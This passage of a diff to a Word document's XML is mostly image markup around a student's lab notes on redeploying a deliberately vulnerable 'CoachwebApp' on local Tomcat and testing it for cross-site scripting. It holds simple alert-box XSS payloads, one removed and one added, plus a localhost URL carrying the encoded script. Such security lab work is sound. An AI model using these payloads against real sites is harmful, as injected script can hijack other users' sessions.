+                          <a:picLocks noChangeAspect="1"/>
+                        </pic:cNvPicPr>
+                        <pic:nvPr/>
+                      </pic:nvPicPr>
+                      <pic:blipFill rotWithShape="1">
+                        <a:blip r:embed="rId18"/>
+                        <a:stretch/>
+                      </pic:blipFill>
+                      <pic:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="6858000" cy="3282420"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                      </pic:spPr>
+                    </pic:pic>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+                <v:stroke joinstyle="miter"/>
+                <v:formulas>
+                  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+                  <v:f eqn="sum @0 1 0"/>
+                  <v:f eqn="sum 0 0 @1"/>
+                  <v:f eqn="prod @2 1 2"/>
+                  <v:f eqn="prod @3 21600 pixelWidth"/>
+                  <v:f eqn="prod @3 21600 pixelHeight"/>
+                  <v:f eqn="sum @0 0 1"/>
+                  <v:f eqn="prod @6 1 2"/>
+                  <v:f eqn="prod @7 21600 pixelWidth"/>
+                  <v:f eqn="sum @8 21600 0"/>
+                  <v:f eqn="prod @7 21600 pixelHeight"/>
+                  <v:f eqn="sum @10 21600 0"/>
+                </v:formulas>
+                <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+                <o:lock v:ext="edit" aspectratio="t"/>
+              </v:shapetype>
+              <v:shape id="_x0000_i9" o:spid="_x0000_s9" type="#_x0000_t75" style="width:540.00pt;height:258.46pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId18" o:title=""/>
+                <o:lock v:ext="edit" rotation="t"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wpg">
+            <w:drawing>
+              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="6858000" cy="931071"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="11" name=""/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:nvPicPr>
+                        <pic:cNvPr id="1819721512" name=""/>
+                        <pic:cNvPicPr>
+                          <a:picLocks noChangeAspect="1"/>
+                        </pic:cNvPicPr>
+                        <pic:nvPr/>
+                      </pic:nvPicPr>
+                      <pic:blipFill rotWithShape="1">
+                        <a:blip r:embed="rId19"/>
+                        <a:stretch/>
+                      </pic:blipFill>
+                      <pic:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="6858000" cy="931070"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                      </pic:spPr>
+                    </pic:pic>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+                <v:stroke joinstyle="miter"/>
+                <v:formulas>
+                  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+                  <v:f eqn="sum @0 1 0"/>
+                  <v:f eqn="sum 0 0 @1"/>
+                  <v:f eqn="prod @2 1 2"/>
+                  <v:f eqn="prod @3 21600 pixelWidth"/>
+                  <v:f eqn="prod @3 21600 pixelHeight"/>
+                  <v:f eqn="sum @0 0 1"/>
+                  <v:f eqn="prod @6 1 2"/>
+                  <v:f eqn="prod @7 21600 pixelWidth"/>
+                  <v:f eqn="sum @8 21600 0"/>
+                  <v:f eqn="prod @7 21600 pixelHeight"/>
+                  <v:f eqn="sum @10 21600 0"/>
+                </v:formulas>
+                <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+                <o:lock v:ext="edit" aspectratio="t"/>
+              </v:shapetype>
+              <v:shape id="_x0000_i10" o:spid="_x0000_s10" type="#_x0000_t75" style="width:540.00pt;height:73.31pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId19" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -1064,7 +1204,498 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wpg">
+            <w:drawing>
+              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="6858000" cy="2874309"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="12" name=""/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:nvPicPr>
+                        <pic:cNvPr id="1968854320" name=""/>
+                        <pic:cNvPicPr>
+                          <a:picLocks noChangeAspect="1"/>
+                        </pic:cNvPicPr>
+                        <pic:nvPr/>
+                      </pic:nvPicPr>
+                      <pic:blipFill rotWithShape="1">
+                        <a:blip r:embed="rId20"/>
+                        <a:stretch/>
+                      </pic:blipFill>
+                      <pic:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="6858000" cy="2874308"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                      </pic:spPr>
+                    </pic:pic>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+                <v:stroke joinstyle="miter"/>
+                <v:formulas>
+                  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+                  <v:f eqn="sum @0 1 0"/>
+                  <v:f eqn="sum 0 0 @1"/>
+                  <v:f eqn="prod @2 1 2"/>
+                  <v:f eqn="prod @3 21600 pixelWidth"/>
+                  <v:f eqn="prod @3 21600 pixelHeight"/>
+                  <v:f eqn="sum @0 0 1"/>
+                  <v:f eqn="prod @6 1 2"/>
+                  <v:f eqn="prod @7 21600 pixelWidth"/>
+                  <v:f eqn="sum @8 21600 0"/>
+                  <v:f eqn="prod @7 21600 pixelHeight"/>
+                  <v:f eqn="sum @10 21600 0"/>
+                </v:formulas>
+                <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+                <o:lock v:ext="edit" aspectratio="t"/>
+              </v:shapetype>
+              <v:shape id="_x0000_i11" o:spid="_x0000_s11" type="#_x0000_t75" style="width:540.00pt;height:226.32pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId20" o:title=""/>
+                <o:lock v:ext="edit" rotation="t"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">And then, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I removed the already existing web module in the tomcat server and re-added it again to ensure it doesn’t stay cached. I already “Clean”ed the tomcat server cache before starting it up again.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wpg">
+            <w:drawing>
+              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="6858000" cy="3521222"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="13" name=""/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:nvPicPr>
+                        <pic:cNvPr id="1573178905" name=""/>
+                        <pic:cNvPicPr>
+                          <a:picLocks noChangeAspect="1"/>
+                        </pic:cNvPicPr>
+                        <pic:nvPr/>
+                      </pic:nvPicPr>
+                      <pic:blipFill rotWithShape="1">
+                        <a:blip r:embed="rId21"/>
+                        <a:stretch/>
+                      </pic:blipFill>
+                      <pic:spPr bwMode="auto">
+                        <a:xfrm rot="0" flipH="0" flipV="0">
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="6858000" cy="3521221"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                      </pic:spPr>
+                    </pic:pic>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+                <v:stroke joinstyle="miter"/>
+                <v:formulas>
+                  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+                  <v:f eqn="sum @0 1 0"/>
+                  <v:f eqn="sum 0 0 @1"/>
+                  <v:f eqn="prod @2 1 2"/>
+                  <v:f eqn="prod @3 21600 pixelWidth"/>
+                  <v:f eqn="prod @3 21600 pixelHeight"/>
+                  <v:f eqn="sum @0 0 1"/>
+                  <v:f eqn="prod @6 1 2"/>
+                  <v:f eqn="prod @7 21600 pixelWidth"/>
+                  <v:f eqn="sum @8 21600 0"/>
+                  <v:f eqn="prod @7 21600 pixelHeight"/>
+                  <v:f eqn="sum @10 21600 0"/>
+                </v:formulas>
+                <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+                <o:lock v:ext="edit" aspectratio="t"/>
+              </v:shapetype>
+              <v:shape id="_x0000_i12" o:spid="_x0000_s12" type="#_x0000_t75" style="width:540.00pt;height:277.26pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId21" o:title=""/>
+                <o:lock v:ext="edit" rotation="t"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
       <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">After all of this, everything seemed to work now.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I tested the /validate route by sending some sample data using curl.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wpg">
+            <w:drawing>
+              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="6858000" cy="2931574"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="14" name=""/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:nvPicPr>
+                        <pic:cNvPr id="1881021264" name=""/>
+                        <pic:cNvPicPr>
+                          <a:picLocks noChangeAspect="1"/>
+                        </pic:cNvPicPr>
+                        <pic:nvPr/>
+                      </pic:nvPicPr>
+                      <pic:blipFill rotWithShape="1">
+                        <a:blip r:embed="rId22"/>
+                        <a:stretch/>
+                      </pic:blipFill>
+                      <pic:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="6858000" cy="2931572"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                      </pic:spPr>
+                    </pic:pic>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+                <v:stroke joinstyle="miter"/>
+                <v:formulas>
+                  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+                  <v:f eqn="sum @0 1 0"/>
+                  <v:f eqn="sum 0 0 @1"/>
+                  <v:f eqn="prod @2 1 2"/>
+                  <v:f eqn="prod @3 21600 pixelWidth"/>
+                  <v:f eqn="prod @3 21600 pixelHeight"/>
+                  <v:f eqn="sum @0 0 1"/>
+                  <v:f eqn="prod @6 1 2"/>
+                  <v:f eqn="prod @7 21600 pixelWidth"/>
+                  <v:f eqn="sum @8 21600 0"/>
+                  <v:f eqn="prod @7 21600 pixelHeight"/>
+                  <v:f eqn="sum @10 21600 0"/>
+                </v:formulas>
+                <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+                <o:lock v:ext="edit" aspectratio="t"/>
+              </v:shapetype>
+              <v:shape id="_x0000_i13" o:spid="_x0000_s13" type="#_x0000_t75" style="width:540.00pt;height:230.83pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId22" o:title=""/>
+                <o:lock v:ext="edit" rotation="t"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
       <w:r/>
     </w:p>
     <w:p>
@@ -1074,8 +1705,9 @@
         <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
-      <w:r/>
+      <w:r>
+        <w:t xml:space="preserve">And it seemed to have been stored as seen below.</w:t>
+      </w:r>
       <w:r/>
     </w:p>
     <w:p>
@@ -1085,8 +1717,6 @@
         <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
-      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
@@ -1094,7 +1724,7 @@
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                 <wp:extent cx="6858000" cy="2244549"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="12" name=""/>
+                <wp:docPr id="15" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -1109,7 +1739,7 @@
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId20"/>
+                        <a:blip r:embed="rId23"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
@@ -1148,8 +1778,8 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i11" o:spid="_x0000_s11" type="#_x0000_t75" style="width:540.00pt;height:176.74pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId20" o:title=""/>
+              <v:shape id="_x0000_i14" o:spid="_x0000_s14" type="#_x0000_t75" style="width:540.00pt;height:176.74pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId23" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
@@ -1157,51 +1787,171 @@
         </mc:AlternateContent>
       </w:r>
       <w:r/>
-      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
       </w:pPr>
       <w:r/>
-      <w:r/>
-      <w:r/>
+      <w:r>
+        <w:t xml:space="preserve">I then started the client application and tested it out with out very basic, simple XSS payload. This did not work.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">&lt;img src=x style="display:none" onerror="alert('XSS on CoachwebApp')"&gt;</w:t>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
       </w:r>
-      <w:r/>
-      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;script&gt;alert(“XSS on CoachwebApp”)&lt;/script&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:hyperlink r:id="rId24" w:tooltip="http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cscript%3Ealert%28%22XSS+on+CoachwebApp%22%29%3B%3C%2Fscript%3E" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="874"/>
+            <w:b/>
+            <w:bCs/>
+            <w:sz w:val="16"/>
+            <w:szCs w:val="16"/>
+            <w:highlight w:val="none"/>
+          </w:rPr>
+          <w:t xml:space="preserve">http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cscript%3Ealert%28%22XSS+on+CoachwebApp%22%29%3B%3C%2Fscript%3E</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
       <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2503874"/>
+                <wp:extent cx="4615675" cy="943802"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="13" name=""/>
+                <wp:docPr id="16" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -1209,20 +1959,20 @@
